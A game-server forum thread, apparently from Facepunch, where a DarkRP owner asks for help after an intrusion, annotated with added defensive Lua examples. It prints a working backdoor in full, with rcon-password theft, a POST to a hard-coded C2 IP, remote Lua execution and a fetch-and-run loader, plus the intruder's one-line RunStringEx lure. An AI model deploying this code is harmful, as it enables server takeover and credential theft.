*BEWARE* Huge Exploit, Nobody's talking about this?
45 replies
I started a new server recently, and a player joined. As soon as he had loaded in, he was able to strip everyone's weapons and remove all entities on the map (printers, etc). He told me he had found an exploit. I made sure to disable clientside scripts in darkrpmodification, and added in cake anticheat. After rebooting, I told the user to rejoin and try again. He got kicked once, and then rejoined, and bypassed the anticheat.
I know there's the big citizenhack, odiumpro, and other things out there that are able to do this. The user mentioned that the way he was exploiting was by the use of net messages. He told me he'd created his own bypass system, and then offered to help me.
He told me that running this line would close net messages to stop people from exploiting properties. I just wanted to see what people thought of this, since I don't know if it is legitimate.
"util.AddNetworkString('ULX_QUERY2') net.Receive('ULX_QUERY2',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)"
Furthermore, if anticheat is so easy to bypass, why am I having difficulty finding a post that mentions this and also has a solution to it? I'm running darkrp with extremely minimal addons. Any scripts I have are from gmodstore as well.
You've got an addon or script somewhere that isn't properly making sure that people running commands are [I]supposed[/I] to be running those commands.
Also, that snippet he gave you is bad. Lets him run any Lua he inputs, serverside.
95% a workshop addon you have running.
Also, do not run anything he gives you.
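The point made in the replies above (a net message handler has to check that the sender is allowed to do what the message asks), as an added example. This is not code from the thread, from DarkRP or from any addon listed here; the net string "RemoveMyEntity", the rate limit and the owner lookup through CPPIGetOwner/GetCreator are assumptions for the illustration.

```lua
-- Added example (not from the thread or any addon named in it). Server-side
-- GMod Lua. "RemoveMyEntity" is a hypothetical net string.
util.AddNetworkString("RemoveMyEntity")

-- VULNERABLE: the server trusts whatever entity the client names and
-- removes it. Any player can delete anyone's printers, weapons, etc.
-- This is the shape of bug that gives a "strip the whole map" exploit.
net.Receive("RemoveMyEntity", function(len, ply)
    local ent = net.ReadEntity()
    if IsValid(ent) then ent:Remove() end
end)

-- HARDENED: same message, but the server decides whether THIS player may
-- touch THIS entity, and throttles the message per player.
local RATE_LIMIT = 0.5 -- seconds between requests per player (assumption)

local function CanRemove(ply, ent)
    if not IsValid(ply) or not IsValid(ent) then return false end
    if ent:IsPlayer() or ent:IsWorld() then return false end
    -- Owner from a CPPI prop-protection addon if one is installed,
    -- otherwise the creator recorded by the engine.
    local owner = ent.CPPIGetOwner and ent:CPPIGetOwner() or ent:GetCreator()
    if owner == ply then return true end
    return ply:IsAdmin()
end

-- net.Receive replaces any earlier handler for the same name, so once this
-- runs only the hardened handler is active.
net.Receive("RemoveMyEntity", function(len, ply)
    local now = CurTime()
    if (ply.NextRemoveRequest or 0) > now then return end
    ply.NextRemoveRequest = now + RATE_LIMIT

    local ent = net.ReadEntity()
    if not CanRemove(ply, ent) then
        -- Log refusals: a burst of these from one SteamID is worth a look.
        ServerLog(string.format("RemoveMyEntity refused: %s (%s) -> %s\n",
            ply:Nick(), ply:SteamID(), tostring(ent)))
        return
    end
    ent:Remove()
end)
```

The one-liner quoted earlier in the thread (a receiver that passes `net.ReadString()` straight to `RunStringEx`) has no hardened form: there is no legitimate reason for a net message to execute arbitrary Lua on the server, so the only fix is to delete it.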
Is it true that using that command and then restarting the server would wipe that command?
[editline]15th July 2017[/editline]
Furthermore, here is a list of my workshop addons.
[url]http://steamcommunity.com/sharedfiles/filedetails/?id=942644044[/url]
[editline]15th July 2017[/editline]
Also, I'm using:
-blogs
-adminpopups
-ahud
-arivia f4
-ascoreboard
-awarn2
-bitminer
-cuffs
-meth
-wyozi cinema kit
-money clickers
[editline]15th July 2017[/editline]
Also, he is able to do this on a darkrp server that has NO addons aside from darkrp and I would imagine ULX.
Even if there were some exploit beyond a backdoor created from an addon, we wouldn't know unless you provided explicit details. Just saying that someone exploited your server doesn't help. I'd venture to guess he wouldn't be able to do this on a purely vanilla DarkRP server.
I just got a message saying to check my ulx config.
He planted a httpfetch hook that gave him access to a bunch of things. I removed the hook, changed rcon password.
I'm being told that my server is done and that there is no way to remove it. Is that entirely true? Also, how did he manage to do this to my server?
[editline]15th July 2017[/editline]
-- server info gathering
-- (The backdoor exactly as posted. Indentation and the explanatory comments
--  were added for readability; the code itself is unchanged.)
if easylua then return end
local pwn = {}
-- Snapshot of the global table and of the Lua registry at load time, so the
-- backdoor keeps calling the original functions even if an anticheat later
-- wraps or replaces the globals.
pwn['G'] = table.Copy(_G)
pwn['R'] = debug.getregistry()
-- Command-and-control endpoint the gathered server data is POSTed to.
pwn['address_full'] = "http://159.203.163.139/index.php"
pwn['address'] = pwn['address_full']
-- Net message names chosen to look like they belong to ULX.
pwn['sstr'] = "ULX_QUERY2" -- server-side: run Lua on the server
pwn['cstr'] = "ULX_QUERY"  -- client-side: run Lua on every connected client
-- SteamIDs of the operators that get error feedback and the "loadpanel" menu.
pwn['sid'] = {
    ["STEAM_0:0:46709807"] = true,
    ["STEAM_0:0:70614886"] = true,
    ["STEAM_0:1:118234279"] = true,
}
pwn['fsender_interval'] = 130       -- seconds before the bootstrap runs
pwn['inj_interface_interval'] = 600 -- seconds between re-pushes of the client receiver
pwn['G']["util"]["AddNetworkString"](pwn['sstr'])
pwn['G']["util"]["AddNetworkString"](pwn['cstr'])
-- Everything below runs inside pcall, so a failure never reaches the server log.
pwn['G']["pcall"](
    function()
        -- Print a chat message on the client of every connected operator.
        pwn['p'] = function(y)
            for k,v in pairs(player.GetAll()) do
                if pwn['sid'][v:SteamID()] then
                    v:oldsendlua([=[ chat.AddText( Color( 255, 93,155, 255 ),[[]=]..y..[=[]]) ]=])
                end
            end
        end
        -- Random upper-case string, used for the timer name and fake chunk names.
        pwn['rstr'] = function ( intMin, intMax )
            local ret = ""
            for _ = 1, pwn['math']["random"]( intMin, intMax ) do
                ret = ret.. string.char( math.random(65, 90) )
            end
            return ret
        end
        -- Send Lua to one client over an "rlua" net message. Not called in this
        -- file, and "rlua" is never registered with AddNetworkString.
        pwn['sli_inj'] = function( pPlayer, strLua )
            pwn['net']["Start"]( "rlua" )
            pwn['net']["WriteString"]( strLua )
            pwn['net']["Send"]( pPlayer )
        end
        -- Install a receiver on the client that runs any string it is sent,
        -- with the chunk name faked to look like a workshop file.
        pwn['sli_interface'] = function (pPlayer )
            pPlayer:oldsendlua( [[net.Receive("ULX_QUERY", function() RunStringEx(net.ReadString(),"lua/addons/gGenerate/workshop.lua",false) end)]] )
        end
        -- Compile and run Lua on the server under a made-up file name; syntax
        -- and runtime errors are reported back to the operators via pwn['p'].
        pwn['runlua'] = function(r, t)
            local y = pwn['G']["CompileString"](r,"lua/addons/gamemode/"..util.CRC(r)..pwn['rstr'](1,4)..".lua",false)
            if type(y) ~= 'function' then
                pwn['p']('SYNTAX ERROR:'..y)
            else
                local u, i = pwn['G']["pcall"](y)
                if not u then
                    pwn['p']('ERROR:'..i)
                end
            end
        end
        -- Gather what gets reported: the rcon password straight out of
        -- cfg/server.cfg, which anticheat is loaded, host name, IP, player
        -- count, gamemode and sv_password. "infectedaddon" is the global
        -- GPVERSION, i.e. the version of the addon carrying the backdoor.
        pwn['chk_scan'] = function()
            for k,v in pairs( string.Split( pwn['file']["Read"]( "cfg/server.cfg", "GAME" ), "\n" ) ) do
                if( string.StartWith( v, "rcon_password" ) ) then
                    local str = v
                    str = string.Replace( str, "\"", "" )
                    str = string.Right( str, #str - 14) -- drops the 14 chars of 'rcon_password '
                    pwn["rcon_config"] = str
                end
            end
            if CAC then
                pwn['anticheat'] = "CAC"
            elseif SimplicityAC then
                pwn['anticheat'] ="SimplicityAC"
            elseif QAC then
                pwn['anticheat'] ="QAC"
            else
                pwn['anticheat'] = "unknown"
            end
            pwn['inf_tbl'] = {
                sn = GetHostName(),
                playercount = tostring( #player.GetAll() ),
                ip = _G["game"]["GetIPAddress"](),
                gamemode = _G["engine"]["ActiveGamemode"](),
                serverpass = _G["GetConVarString"]( "sv_password" ) or "nil",
                rcon = pwn['rcon_config'] or "nil",
                currentac = pwn['anticheat'] or "nil",
                infectedaddon = GPVERSION or "nil"
            }
        end
        -- Bootstrap: save originals, scan, report, then keep re-installing the
        -- client receiver on every player and listen for server-side commands.
        pwn['bstrapper'] = function()
            pwn['def_registry']()
            pwn['chk_scan']()
            pwn['chk_pos']()
            pwn['G']['timer']['Create'](pwn['rstr'](1,6),pwn['inj_interface_interval'],0,function()
                for k,v in pairs(player.GetAll()) do
                    pwn['sli_interface'] (v)
                end
                pwn['reg_interval'](450)
            end)
            -- Server-side remote code execution. There is no sender check at
            -- all: any client that knows the net string name can run Lua on
            -- the server. (GMod passes (len, ply) to the callback; the names
            -- here are reversed, but neither argument is used.)
            pwn['net']['Receive']("ULX_QUERY2",function(pl,len)
                local gstr = pwn["net"]["ReadString"]()
                local gbit = pwn["net"]["ReadBit"]()
                if gbit == 1 then
                    pwn['runlua'](gstr)
                end
            end)
        end
        -- Only updates the stored value; the timer created above keeps the
        -- repeat interval it was created with.
        pwn['reg_interval'] = function(gq)
            pwn['inj_interface_interval'] = gq
        end
        -- Keep copies of Player methods in the registry metatable under new
        -- names, so later detours of SendLua/SteamID/UniqueID/Nick are bypassed.
        pwn['def_registry'] = function()
            pwn['R']["Player"]["oldsendlua"] = pwn['R']["Player"]["SendLua"]
            pwn['R']["Player"]["oldsteamid"] = pwn['R']["Player"]["SteamID"]
            pwn['R']["Player"]["oldunique"] = pwn['R']["Player"]["UniqueID"]
            pwn['R']["Player"]["oldnick"] = pwn['R']["Player"]["Nick"]
            -- globals
            pwn['math'] = pwn['G']["math"]
            pwn['net'] = pwn['G']["net"]
            pwn['http'] = pwn['G']["http"]
            pwn['file'] = pwn['G']["file"]
        end
        -- Exfiltration: POST the gathered table (rcon password included) to
        -- the C2 address, only on dedicated servers.
        pwn['chk_pos'] = function()
            if SERVER and pwn['G']["game"]["IsDedicated"]() then -- report the server to our addr
                pwn['http']["Post"](pwn['address'], pwn["inf_tbl"] )
            end
        end
        -- advanced hiding techniques :D , not rly .
        -- Remote loader: fetch Lua from a URL and run it on the server.
        pwn['Fetchcode'] = function(url)
            pwn['http']["Fetch"](url,function(c) pwn['runlua'](c) end)
        end
        -- Console command "loadpanel": an operator gets lua/bkit.lua executed
        -- on their own client if that file exists; everyone, operator or not,
        -- is shown a fake "Unknown command" line so the command looks
        -- unregistered.
        pwn['chk_panel'] = function (ply,cmd,args)
            if pwn["sid"][ply:SteamID()] then
                ply:oldsendlua([=[
                    if file.Exists("lua/bkit.lua","GAME") then
                        _G["RunStringEx"](file.Read("lua/bkit.lua","GAME"))
                        MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")
                    else
                        MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")
                    end
                ]=])
            else
                ply:oldsendlua([=[MsgC( Color( 255, 255, 255,255 ),"Unknown command: loadpanel\n")]=])
            end
        end
        pwn['G']["concommand"]["Add"]("loadpanel",pwn['chk_panel'] )
        -- Run the bootstrap 130 seconds after this file loads.
        pwn['G']["timer"]["Simple"](pwn['fsender_interval'] ,function()
            pwn['bstrapper'] ()
        end)
    end
)
From an exploit in one of your addons or FTP.
Given the huge thing I just posted, even though I removed it, is my server even safe anymore?
[editline]15th July 2017[/editline]
Is this literal malware? Do I need to completely wipe my server?
[editline]15th July 2017[/editline]
I would really appreciate knowing whether or not my server is at all safe?
I've changed my authkey, changed my rcon password
Can you fill us in where you got that copy of ulx from?
You should probably check the source to make sure someone else didn't upload that file to your server.
The person managed to plant that in the server.
[B]Now that it is removed, is my server safe?[/B]
[editline]15th July 2017[/editline]
Will someone please respond with a yes/no?
So you're saying someone remotely updated your ulx config file?
Yes, he was able to bypass my cake anticheat and somehow managed to upload that.
Now, back to my question, looking at the malicious code that was injected, is there anything I need to be worried about, now that all my passwords are changed?
I've done nothing to receive that title.
Can someone useful reply though?
You asking us if your server is safe is not a very good question, how are we supposed to know? The only thing you can do is check all of your addons for backdoors, etc.
Assuming that's the only exploit your server will be fine once it's removed.
However, I'd be more concerned about how he/she managed to upload the file. If the person exploiting your server has access to upload files, what's to stop them uploading another file?
[QUOTE=Moat;52472546]Can you tell us which addon that code was from so we can make sure this doesn't happen again?[/QUOTE]
It was inside of the ulx config. I got the standard ulx. It was clearly done by this player: [url]http://steamcommunity.com/id/Childlike/[/url]
he is an experienced hacker as well. Just look at his profile.
[editline]15th July 2017[/editline]
It appears this guy is one of the creators of odium.pro.
[quote]experienced hacker[/quote]
[img]http://i.imgur.com/aqCNELV.png[/img]
In all seriousness, he's probably using an exploit in regards to an addon you have. He could possibly be using a game exploit, but I don't really see strong evidence of that as of yet.
Try looking at his youtube.
He's trashed like a dozen servers.
There's no exploit being used, it's just backdoors or gullible owners adding random shit that gives skids access to your server.
His youtube points towards it being a backdoor.
After removing the script, changing passwords, and running nomalua, the only thing of concern I have left is:
73 2 - DYNCODE (Dynamic code execution) lua/ulx/modules/sh/rcon.lua:17 RunString( command )
Just having a hard time finding that filepath since lua/ doesn't have a ulx directory.
[editline]15th July 2017[/editline]
I'm also not sure I like a file called "smashhash_dont_delete" with encrypted characters. (garrysmod/data/_smashhash_dont_delete.lua)
[url]https://github.com/TeamUlysses/ulx/blob/master/lua/ulx/modules/sh/rcon.lua#L21[/url]
Seems like your ULX is out-of-date if the code is on line 17.
You should probably just completely reinstall your addons and check each for backdoors.
I don't know which addon it came from, only that the person was able to execute a lot of commands with it.
All addons I'm using were posted above, hope someone is able to find the backdoor that was used.
[editline]15th July 2017[/editline]
The person is most certainly affiliated with odium.pro.
From there, he was able to bypass anticheat and do his dirty work.
[editline]15th July 2017[/editline]
Not sure what people are disagreeing with my comments about, given the fact that odium.pro is known to be able to bypass cake anticheat somehow (go ahead and read comments, it's been altered in the latest version to once again be able to break through cac, qac, etc)
Anyway, I've reinstalled the addons. I'll post again if I see anything happen.
You should do what's been suggested and reinstall all of your addons. Code_bs pointed out that your ULX is likely out of date, which means you almost certainly downloaded ULX/ULib from somewhere other than [URL="http://ulyssesmod.net/downloads.php"]their website[/URL].
Your other addons should be checked for backdoors also. You didn't really specify where each of them came from. Workshop?
[B]Edit: [/B]Ninjad a lil. But, cake anticheat isn't going to help you against bad code that has exploits or backdoors in it. It's an irrelevant piece of information and just because you have the anticheat on your server doesn't mean the person is getting around it.
I have a list of both workshop addons and scripts that I've purchased from scriptfodder/gmodstore.
Also fixed the ULX error.
[QUOTE=Serenity3;52472679]it was inside of the ulx config. I got the standard ulx. it was clearly done by this player: [url]http://steamcommunity.com/id/Childlike/[/url]
he is an experienced hacker as well. Just look at his profile.
[editline]15th July 2017[/editline]
It appears this guy is one of the creators of odium.pro.[/QUOTE]
Gotta say, its absolutely hilarious how stereotypical this guys profile is. Anime avatars, MAGA hats, moving steam images to make yourself look ~professional~, ISIS memes, rick and morty gifs
He's even in a steam group called fucking 'Hentai!'
Holy fuck
Yeah. It's also somewhat strange how he asks everyone in the youtube videos to report him on steam (which the staff undoubtedly do), his description talks about different illegal items, and yet his account still hasn't been terminated :s:
I should also mention that in that malicious file, looking through the code, it called for "infectedaddon" so yeah. Definitely something on the workshop was giving access.
Still looking through files with nomalua to find what and how this happened.
[QUOTE=Serenity3;52474218]Yeah. It's also somewhat strange how he asks everyone in the youtube videos to report him on steam (which the staff undoubtedly do), his description talks about different illegal items, and yet his account still hasn't been terminated :s:
I should also mention that in that malicious file, looking through the code, it called for "infectedaddon" so yeah. Definitely something on the workshop was giving access.
Still looking through files with nomalua to find what and how this happened.[/QUOTE]
Please, look through the files yourself, the creator of nomalua did not know what he was doing and did that in the worst way possible.
1. There is no malware in GMod (I mean, there is but that addon wouldn't detect it, an antivirus would, but I find very hard that that backdoor installed one)
2. The stuff it scans for won't be found in any backdoor done by anyone with more than a single brain cell.
3. It gives so many false-positives for legit stuff (it would give flags for CAC) that it isn't worth using
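The reply above is right that a bare grep for RunString or http calls flags half the legitimate addons on a server. An added example of how to do the pass yourself, with the noise kept down: this is not code from the thread and not nomalua. It reports every indicator hit with its line number, but only calls a file suspicious when dynamic code execution sits next to something a backdoor needs and a normal addon rarely has (a hard-coded IP or SteamID, reading rcon_password, an outbound POST, registry access). It runs under a standalone Lua 5.1+ interpreter on the host, the directory walk uses POSIX find (an assumption), and the two sample sources at the bottom are constructed for the demo.

```lua
-- Added example, not from the thread and not nomalua. Standalone Lua 5.1+.
--   lua scan.lua                      -> scans the two constructed samples
--   lua scan.lua /path/to/garrysmod   -> scans every *.lua under that tree
-- Patterns match bare names on purpose: the backdoor posted above reaches
-- CompileString, http.Post etc. through pwn['G'][...] lookups, but the names
-- still appear as string literals and are caught.
local EXEC = {
    { pat = "RunString",     why = "dynamic code execution" },
    { pat = "CompileString", why = "dynamic code compilation" },
    { pat = "Fetch%W",       why = "remote fetch (possible loader)" },
}
local INTENT = {
    { pat = "rcon_password",      why = "reads rcon password" },
    { pat = "%d+%.%d+%.%d+%.%d+", why = "hard-coded IP address" },
    { pat = "STEAM_%d:%d:%d+",    why = "hard-coded SteamID" },
    { pat = "Post%W",             why = "outbound POST (possible exfiltration)" },
    { pat = "getregistry",        why = "registry access (method hooking)" },
}

-- Scan one source string. Returns the findings {line, why, text} and a
-- verdict: "suspicious" (exec AND intent hits), "review" (only one kind),
-- or "clean".
local function scan_source(src)
    local findings, has_exec, has_intent, lineno = {}, false, false, 0
    for line in (src .. "\n"):gmatch("(.-)\n") do
        lineno = lineno + 1
        for _, ind in ipairs(EXEC) do
            if line:find(ind.pat) then
                has_exec = true
                findings[#findings + 1] = { line = lineno, why = ind.why, text = line }
            end
        end
        for _, ind in ipairs(INTENT) do
            if line:find(ind.pat) then
                has_intent = true
                findings[#findings + 1] = { line = lineno, why = ind.why, text = line }
            end
        end
    end
    local verdict = "clean"
    if has_exec and has_intent then verdict = "suspicious"
    elseif has_exec or has_intent then verdict = "review" end
    return findings, verdict
end

local function scan_file(path)
    local f, err = io.open(path, "r")
    if not f then return nil, err end
    local src = f:read("*a")
    f:close()
    return scan_source(src)
end

-- Walk a tree with POSIX find (assumption: Linux/BSD host).
local function scan_tree(root)
    local p = io.popen("find '" .. root .. "' -name '*.lua' 2>/dev/null")
    for path in p:lines() do
        local findings, verdict = scan_file(path)
        if verdict and verdict ~= "clean" then
            print(string.format("[%s] %s", verdict:upper(), path))
            for _, fnd in ipairs(findings) do
                print(string.format("  %5d  %-36s %s", fnd.line, fnd.why, (fnd.text:gsub("^%s+", ""))))
            end
        end
    end
    p:close()
end

-- Constructed samples (TEST-NET address, not a real C2).
local SAMPLE_BACKDOOR = [[
local c2 = "http://203.0.113.10/index.php"
net.Receive("ULX_QUERY2", function(len, ply)
    RunStringEx(net.ReadString(), "[C]", false)
end)
for _, l in ipairs(string.Split(file.Read("cfg/server.cfg", "GAME"), "\n")) do
    if string.StartWith(l, "rcon_password") then http.Post(c2, { rcon = l }) end
end
]]
-- A permission-checked handler with no dynamic execution: the kind of code a
-- blanket RunString/HTTP grep would flag a neighbour of, and should not.
local SAMPLE_BENIGN = [[
net.Receive("RemoveMyEntity", function(len, ply)
    local ent = net.ReadEntity()
    if IsValid(ent) and ent:CPPIGetOwner() == ply then ent:Remove() end
end)
]]

if arg and arg[1] then
    scan_tree(arg[1])
else
    for name, src in pairs({ backdoor = SAMPLE_BACKDOOR, benign = SAMPLE_BENIGN }) do
        local findings, verdict = scan_source(src)
        print(name .. ": " .. verdict .. " (" .. #findings .. " indicator hits)")
    end
end
```

Two caveats. An anticheat such as CAC will land in "review" or even "suspicious" because it legitimately uses RunString and the registry; the verdict is a triage order, not a conviction, and every hit still gets read by a person. And a backdoor that builds its names with string.char or pulls its payload from a URL at runtime leaves nothing for these patterns, which is the reply's second point: the scan tells you where to look first, not that the server is clean.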